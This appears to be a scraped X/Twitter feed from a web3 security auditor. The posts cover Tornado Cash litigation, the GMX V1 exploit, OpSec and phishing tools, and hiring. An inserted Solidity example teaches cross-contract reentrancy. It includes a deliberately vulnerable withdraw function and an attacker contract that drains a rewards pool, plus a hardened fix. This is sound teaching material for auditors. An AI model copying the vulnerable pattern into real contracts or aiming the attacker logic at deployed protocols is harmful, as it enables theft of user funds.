Joe | Audit Wizard
@joe_vanloon
Professional security wizard, building @audit_wizard, making audits great again - previously worked @apple
⏳ Final push next week. Our lawyers and experts are working around the clock — we’ve forgotten what normal sleep feels like. Every hour counts, and so do the costs. If you believe in fairness, open-source, and freedom, please help us finish strong. 🙏 👉…
Ethereum core developer @preston_vanloon took the stand to testify in the defense of @rstormsf. This is why I love Ethereum - ETH is being built with a vicious commitment to values and freedom. Rainbows and unicorns in the front, but claws and teeth in the back.
Hacks aren't just from vulnerable code. They happen because people use personal laptops for work, because a new dev hire was infected by malware, or because multi-sig ops were not perfect. We decided it was time to fix this, so we built Sentry, a platform that secures your OpSec.
Cooking up the design for our new Blogs page on Web3SecNews with @navdeep1840. It's contributor-friendly too, so anyone can write, publish under their name, and help others stay sharp on the latest in web3 security and OpSec. DM if you'd like to collab and write articles!!! PS:…
Another wild twist. Cross-contract reentrancy! Does anyone remember that Vyper bug that allowed cross-function reentrancy when using the built-in guard? Auditors should always verify the mutex scope when you see the 'nonReentrant' modifier; it can be deceptive 🧙‍♂️
x.com/i/article/1943…
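The mutex-scope point in the cross-contract reentrancy post above, as an added Solidity example (this is not code from Joe, Audit Wizard, or the Vyper project, and it shows the general Solidity pattern rather than the Vyper compiler bug itself). The `Vault`, `Rewards` and `Attacker` contracts and all of their functions are hypothetical, and `Rewards` is assumed to be prefunded with ETH for payouts:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal reentrancy guard. The mutex is a storage variable of the contract
// that inherits it, so it only locks re-entry into *that* contract.
abstract contract ReentrancyGuard {
    uint256 private _locked = 1;

    modifier nonReentrant() {
        require(_locked == 1, "reentrant");
        _locked = 2;
        _;
        _locked = 1;
    }
}

// Hypothetical vault. Both withdraw variants carry nonReentrant.
contract Vault is ReentrancyGuard {
    mapping(address => uint256) public balanceOf;

    function deposit() external payable {
        balanceOf[msg.sender] += msg.value;
    }

    // Vulnerable: the guard does stop a second call into Vault, but the external
    // call happens before balanceOf is updated, so any *other* contract that reads
    // balanceOf() during the callback sees the pre-withdrawal balance.
    function withdrawVulnerable(uint256 amount) external nonReentrant {
        require(balanceOf[msg.sender] >= amount, "insufficient");
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balanceOf[msg.sender] -= amount;
    }

    // Hardened: checks-effects-interactions. State is final before the call, so
    // cross-contract readers observe the post-withdrawal balance.
    function withdraw(uint256 amount) external nonReentrant {
        require(balanceOf[msg.sender] >= amount, "insufficient");
        balanceOf[msg.sender] -= amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Hypothetical consumer that trusts Vault.balanceOf as collateral. Its own
// nonReentrant mutex is a different storage slot in a different contract and
// cannot see that Vault is mid-withdrawal: the attacker is not re-entering
// Rewards, it is entering Rewards for the first time from inside Vault's callback.
contract Rewards is ReentrancyGuard {
    Vault public immutable vault;
    mapping(address => uint256) public claimed;

    constructor(Vault v) { vault = v; }

    // Pays 1 wei of reward per wei of vault collateral, once per address.
    function claim() external nonReentrant {
        require(claimed[msg.sender] == 0, "claimed");
        uint256 collateral = vault.balanceOf(msg.sender); // stale during a Vault callback
        claimed[msg.sender] = collateral;
        (bool ok, ) = msg.sender.call{value: collateral}("");
        require(ok, "pay failed");
    }

    receive() external payable {} // allows prefunding the reward pool
}

// Hypothetical attacker: deposit, withdraw via the vulnerable path, and claim
// rewards while Vault still reports the deposit as collateral.
contract Attacker {
    Vault immutable vault;
    Rewards immutable rewards;

    constructor(Vault v, Rewards r) { vault = v; rewards = r; }

    function run() external payable {
        vault.deposit{value: msg.value}();
        vault.withdrawVulnerable(msg.value); // Vault pays us, triggering receive()
    }

    receive() external payable {
        if (msg.sender == address(vault)) {
            // Vault's balanceOf[this] has not been decremented yet, so Rewards
            // pays out against collateral that is being withdrawn in this same tx.
            rewards.claim();
        }
        // Payment from Rewards lands here too and is simply kept.
    }
}
```

The audit check this illustrates: a `nonReentrant` modifier protects exactly the contract whose storage holds the lock. Whenever a guarded function makes an external call before its state is final, list every other contract that reads that state and ask whether it can be called during the callback; if it can, either finalize state before the call (as in `withdraw`) or have the readers consult the same lock.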
Good message. The unfortunate truth is that attackers very rarely return the money once they have stolen it. You have to hope it was just a dumb kid who is now scared and not DPRK agents who will never give a shit. Great to see GMX's huge bug bounty budget, though. What chads 💪
Posting this message in hopes of connecting with the individual responsible for the GMX V1 exploit. You've successfully executed the exploit; your abilities in doing so are evident to anyone looking into the exploit transactions. The white-hat bug bounty of $5 million continues…
Wow, this is so wild and really demonstrates the importance of redundant data sources and invariant monitoring. Pretty spooky stuff to learn that a core piece of infra is vulnerable like this.
It gets even more fancy: the way Etherscan was tricked showing the wrong implementation contract is based on setting 2 different proxy slots in the same frontrunning tx. So Etherscan uses a certain heuristic that incorporates different storage slots to retrieve the implementation…
Roman Storm's trial starts in 5 days. Just like my lawsuit against the OFAC sanctions, Roman is fighting for our fundamental right to financial privacy. Unlike me, however, he is also fighting for his life. I wish him all the best and hope he emerges as a free man 💜
Sad to see an organization that I know takes security very seriously getting hacked like this. I guess the takeaway from this is that hacks are not necessarily an if but a when, and preventative measures like on-chain firewalls should be a requirement for preparing for that day.
The GLP pool of GMX V1 on Arbitrum has experienced an exploit. Approximately $40M in tokens has been transferred from the GLP pool to an unknown wallet. Security has always been a core priority for GMX, with the GMX smart contracts undergoing numerous audits from top security…
Sorry, how is this a "standard" if it isn't accessible to anyone else? Publish the framework or call this what it is, a closed-source marketing gimmick.
Institutions need a way to evaluate DeFi risk. Organizations need a path to institutional adoption. Introducing the Web3SOC, the framework that evaluates security, governance, financial resilience, and compliance.
Web3 security has grown beyond just on-chain hacks. Now, orgs are faced with ever-evolving threats targeting web2 and OpSec attack vectors, and we must evolve to combat them. We've frustratingly seen many organizations fall victim to easily preventable compromises (large…
Wake up babe, new web3 phishing training just dropped. We need more initiatives like this or OpSec compromises will continue to plague our industry. I think there is some work to be done to make this more accessible to organizations (35 challenges is a lot), but this is a start.
🔥 The Unphishable project we've been working on for the past few months is officially launching. Unphishable is officially live! 🚀 Big shoutout to @SlowMist_Team @realScamSniffer and @DeFiHackLabs @EF_ESP @Geodework @GoPlusSecurity for the strong support!
It can happen to the best of us. Security is hard to do perfectly, it is a constant tug-of-war between security priorities and business needs. The takeaway here is to elect a security champion to keep track of your risks and be a constant thorn in your side until you fix them 🔐
A Chain Is Only as Strong as Its Weakest Link: Learning from Our Security Incident Over the past weekend, our team at $HAI has been grappling with a security incident stemming from an outdated piece of our infrastructure. The situation is ironic, given our role in security,…
Radar 🔴 A static analysis tool for Anchor Rust programs by Auditware. Another great tool for the Solana/Rust CI pipeline 🚀 github.com/Auditware/radar
After the 5th Cir. ruled against the government in November, it repeatedly tried to avoid entry of a final judgment in the Tornado Cash case. It asked the Court TWICE for long delays before claiming the case was moot (with no final judgment needed) b/c they had chosen to remove…
Happy to share that we're expanding our internal Web2 security team! If you're excited about securing the entire application stack for a new global economy shoot me a DM!
Web2 security engineers — we want you. Guardian is building a new internal team and hiring security engineers with deep expertise in infrastructure, frontend, and OpSec. If you're ready to help set a new standard in security, let's talk. DMs open 👀
Power does not recede voluntarily. It gasps and it gasps until it no longer can. @USTreasury filed yet another late Friday pleading against Tornado Cash. After grudgingly delisting TC, they now claim they've mooted any need for a final court judgment. But that's not the law,…